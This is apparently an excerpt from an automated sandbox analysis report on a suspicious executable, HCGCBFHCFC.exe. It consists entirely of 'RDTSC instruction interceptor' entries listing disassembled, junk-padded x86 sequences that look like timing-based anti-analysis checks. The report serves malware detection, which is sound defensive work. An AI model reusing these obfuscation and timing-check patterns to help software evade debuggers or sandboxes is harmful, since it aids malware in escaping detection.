                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF0986 second address: 4BF09C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F73D4D0E051h 0x00000009 add ax, 0D16h 0x0000000e jmp 00007F73D4D0E051h 0x00000013 popfd 0x00000014 mov ecx, 72DC3387h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF09C1 second address: 4BF09C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF09C5 second address: 4BF09CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF09CB second address: 4BF09EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F73D4C5760Dh 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF09EF second address: 4BF0A04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0034 second address: 4BA0043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0043 second address: 4BA0134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c call 00007F73D4D0E04Dh 0x00000011 pop esi 0x00000012 pushfd 0x00000013 jmp 00007F73D4D0E051h 0x00000018 and esi, 6DB8FBC6h 0x0000001e jmp 00007F73D4D0E051h 0x00000023 popfd 0x00000024 popad 0x00000025 call 00007F73D4D0E050h 0x0000002a pushfd 0x0000002b jmp 00007F73D4D0E052h 0x00000030 adc eax, 0C3FB798h 0x00000036 jmp 00007F73D4D0E04Bh 0x0000003b popfd 0x0000003c pop eax 0x0000003d popad 0x0000003e xchg eax, ebp 0x0000003f pushad 0x00000040 movzx ecx, bx 0x00000043 popad 0x00000044 mov ebp, esp 0x00000046 jmp 00007F73D4D0E053h 0x0000004b and esp, FFFFFFF8h 0x0000004e jmp 00007F73D4D0E056h 0x00000053 xchg eax, ecx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 pushfd 0x00000058 jmp 00007F73D4D0E04Dh 0x0000005d sbb si, 8146h 0x00000062 jmp 00007F73D4D0E051h 0x00000067 popfd 0x00000068 mov bx, si 0x0000006b popad 0x0000006c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0134 second address: 4BA01A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F73D4C57613h 0x00000008 pop ecx 0x00000009 mov dx, AE2Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007F73D4C57612h 0x00000016 xchg eax, ecx 0x00000017 jmp 00007F73D4C57610h 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F73D4C5760Dh 0x00000026 xor si, DD66h 0x0000002b jmp 00007F73D4C57611h 0x00000030 popfd 0x00000031 mov dh, ch 0x00000033 popad 0x00000034 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA01A2 second address: 4BA01A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA01A8 second address: 4BA01C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA01C9 second address: 4BA01CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA01CF second address: 4BA01F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F73D4C57610h 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA01F7 second address: 4BA0206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0206 second address: 4BA021E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C57614h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA021E second address: 4BA0249 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F73D4D0E055h 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0249 second address: 4BA0265 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0265 second address: 4BA0269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0269 second address: 4BA027C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA027C second address: 4BA0282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0282 second address: 4BA0299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0299 second address: 4BA02A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, ecx 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA02A0 second address: 4BA0305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F73D4C5760Eh 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 jmp 00007F73D4C57610h 0x00000017 xchg eax, edi 0x00000018 jmp 00007F73D4C57610h 0x0000001d push eax 0x0000001e jmp 00007F73D4C5760Bh 0x00000023 xchg eax, edi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F73D4C57610h 0x0000002d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0305 second address: 4BA0314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0314 second address: 4BA0379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F73D4C5760Fh 0x00000009 sub ah, FFFFFFAEh 0x0000000c jmp 00007F73D4C57619h 0x00000011 popfd 0x00000012 jmp 00007F73D4C57610h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test esi, esi 0x0000001c pushad 0x0000001d mov si, 837Dh 0x00000021 mov ebx, ecx 0x00000023 popad 0x00000024 je 00007F74474658BAh 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F73D4C5760Eh 0x00000033 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0379 second address: 4BA037F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA037F second address: 4BA03C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007F73D4C57610h 0x00000015 je 00007F7447465889h 0x0000001b jmp 00007F73D4C57610h 0x00000020 mov edx, dword ptr [esi+44h] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov esi, ebx 0x00000028 mov eax, ebx 0x0000002a popad 0x0000002b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA03C9 second address: 4BA03FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E052h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F73D4D0E050h 0x00000011 test edx, 61000000h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA03FE second address: 4BA0404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0404 second address: 4BA0444 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E054h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F744751C2B2h 0x0000000f jmp 00007F73D4D0E050h 0x00000014 test byte ptr [esi+48h], 00000001h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F73D4D0E04Ah 0x00000021 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0444 second address: 4BA0453 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0453 second address: 4BA0486 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ebx, 71F97098h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jne 00007F744751C287h 0x00000013 jmp 00007F73D4D0E057h 0x00000018 test bl, 00000007h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0486 second address: 4BA048C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B908DE second address: 4B908ED instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B908ED second address: 4B90907 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57616h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90907 second address: 4B9090D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B9090D second address: 4B90911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90911 second address: 4B90930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F73D4D0E054h 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90930 second address: 4B90936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90936 second address: 4B9093A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B9093A second address: 4B90953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F73D4C5760Bh 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90953 second address: 4B90957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90957 second address: 4B9095D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B9095D second address: 4B9098F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E054h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d mov si, 843Dh 0x00000011 mov di, si 0x00000014 popad 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F73D4D0E04Bh 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B9098F second address: 4B909A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C57614h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B909A7 second address: 4B909EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F73D4D0E055h 0x00000014 add cx, F516h 0x00000019 jmp 00007F73D4D0E051h 0x0000001e popfd 0x0000001f mov ch, FBh 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov dh, 11h 0x00000026 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B909EF second address: 4B90A40 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F73D4C5760Dh 0x00000010 sbb ecx, 1EE3A926h 0x00000016 jmp 00007F73D4C57611h 0x0000001b popfd 0x0000001c mov si, DA57h 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 jmp 00007F73D4C5760Ah 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F73D4C5760Eh 0x0000002f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90A40 second address: 4B90A8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F73D4D0E051h 0x00000009 adc si, EBE6h 0x0000000e jmp 00007F73D4D0E051h 0x00000013 popfd 0x00000014 push esi 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F73D4D0E059h 0x00000021 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90A8D second address: 4B90AFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F73D4C57617h 0x00000009 xor cx, 2C7Eh 0x0000000e jmp 00007F73D4C57619h 0x00000013 popfd 0x00000014 call 00007F73D4C57610h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov esi, dword ptr [ebp+08h] 0x00000020 jmp 00007F73D4C57611h 0x00000025 sub ebx, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F73D4C5760Ah 0x0000002e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90AFD second address: 4B90B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E04Eh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90B0F second address: 4B90B13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90C36 second address: 4B90C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E059h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90C53 second address: 4B90C93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [77436968h], 00000002h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F73D4C57616h 0x00000018 sub ecx, 18B31738h 0x0000001e jmp 00007F73D4C5760Bh 0x00000023 popfd 0x00000024 mov si, 796Fh 0x00000028 popad 0x00000029 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90C93 second address: 4B90CAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F744752375Eh 0x00000011 pushad 0x00000012 mov eax, 68A85F75h 0x00000017 push eax 0x00000018 push edx 0x00000019 mov ebx, eax 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90CAE second address: 4B90D16 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 21CE82F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov edx, dword ptr [ebp+0Ch] 0x0000000d jmp 00007F73D4C57616h 0x00000012 xchg eax, ebx 0x00000013 pushad 0x00000014 push esi 0x00000015 mov dx, 1210h 0x00000019 pop ebx 0x0000001a mov bl, ch 0x0000001c popad 0x0000001d push eax 0x0000001e jmp 00007F73D4C57610h 0x00000023 xchg eax, ebx 0x00000024 jmp 00007F73D4C57610h 0x00000029 xchg eax, ebx 0x0000002a jmp 00007F73D4C57610h 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90D16 second address: 4B90D32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E058h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90D32 second address: 4B90D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90D38 second address: 4B90D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90D3C second address: 4B90D40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90D40 second address: 4B90D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F73D4D0E059h 0x0000000e push dword ptr [ebp+14h] 0x00000011 jmp 00007F73D4D0E04Eh 0x00000016 push dword ptr [ebp+10h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F73D4D0E04Dh 0x00000021 mov ch, 0Bh 0x00000023 popad 0x00000024 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90DE7 second address: 4B90DF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90DF6 second address: 4B90DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90DFC second address: 4B90E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0DE9 second address: 4BA0DFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E051h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0B70 second address: 4BA0BAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F73D4C5760Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F73D4C5760Eh 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0BAD second address: 4BA0BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E04Eh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0BBF second address: 4BA0BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0BC3 second address: 4BA0BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0BD2 second address: 4BA0BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0BD6 second address: 4BA0BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0BDA second address: 4BA0BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BA0BE0 second address: 4BA0C27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F73D4D0E056h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ecx, ebx 0x00000016 jmp 00007F73D4D0E059h 0x0000001b popad 0x0000001c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C2076A second address: 4C2077D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
